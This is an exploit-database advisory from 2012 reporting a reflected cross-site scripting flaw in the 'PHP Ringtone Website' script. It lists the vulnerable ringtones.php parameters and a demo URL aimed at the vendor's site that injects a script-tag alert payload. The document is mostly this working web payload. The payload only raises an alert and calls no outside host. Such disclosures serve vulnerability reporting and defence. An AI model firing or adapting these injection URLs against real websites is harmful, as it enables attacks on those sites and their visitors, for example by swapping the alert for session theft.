PHP Ringtone Website Cross Site Scripting

2012.01.16
Credit: Atmon3r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############################################################################ # # Exploit Title: PHP Ringtone Website # Date: 14/01/2012 # Author: Atmon3r # Discovered By: Atmon3r # Software Link: http://www.e-soft24.com/php-ringtone-website-p-351.html # Version: All Version # Security Risk:: Low # Tested on: GNU/Linux Ubuntu # ############################################################################ # # Exploit: # http://www.website.com/[path]/ringtones.php?mmchar0_1=[xss]&mmstart0_1=1&mmsection0_1=[xss] # ############################################################################ # # Demo: # http://www.e-soft24.com/ringtones/ringtones.php?mmchar0_1=G/"><script>alert('Xss By Atm0n3r')</script>&mmstart0_1=1&mmsection0_1=/"><script>alert('Xss By Atm0n3r')</script> # ############################################################################

References:

http://www.e-soft24.com/php-ringtone-website-p-351.html


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top